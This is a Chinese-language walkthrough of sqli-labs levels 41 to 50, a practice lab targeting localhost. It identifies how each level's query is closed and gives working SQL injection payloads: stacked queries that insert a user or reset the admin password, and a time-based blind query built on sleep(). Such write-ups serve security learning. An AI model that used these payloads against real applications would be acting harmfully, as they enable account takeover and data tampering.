第四十一题
判断为数字型注入,如果使用union注入很快可以,但这里可以使用堆叠查询注入
也是跟上一题一样的。
id=1;insert into users(id,username,password) value (21,'sd','bd')--+d
第四十二题
是一个post型传参
再password处存在闭合方式为‘的注入
如果使用报错注入会很简单
如果点击新建用户,会看到:
因此用注入的方式创建一个用户
修改admin密码
1';update users set password=12344 where username='admin';
第四十三题
存在')闭合注入,报错注入
或者堆叠查询注入
login_user=1&login_password=1');update users set password='sdsdsd' where username='admin';-- -&mysubmit=Login
第四十四题
测试' 、"等都没有反应
使用以下语句,用户名正确,密码用万能密码
发现'时页面不一样
如果不用抓包的话其实已经登录成功了
因此是’闭合。
还是堆叠查询注入
login_user=admin&login_password=1';insert into users(id,username,password) value (21,'sd','bd')--+&mysubmit=Login
第四十五题
没有任何回显,使用语句admin')#登录成功,闭合方式为‘)
依然是堆叠查询注入。与之前一样
第四十六题
为数字型注入
第四十七题
上一题中sort只能填1到3,这里无论填了几都是一样的输出
判断闭合方式为’的字符型注入
继续用报错注入
第四十八题
数字型注入,没有错误回显,使用时间盲注
http://localhost/sqli-labs-php7-master/Less-48?sort=1 and (if (ascii(substr(database(),1,1))=163,0,sleep(5)))--+
第四十九题
闭合方式为'的时间盲注,与上一题一样。
第五十题
数字型注入,有报错回显
可以报错注入也可以堆叠查询注入。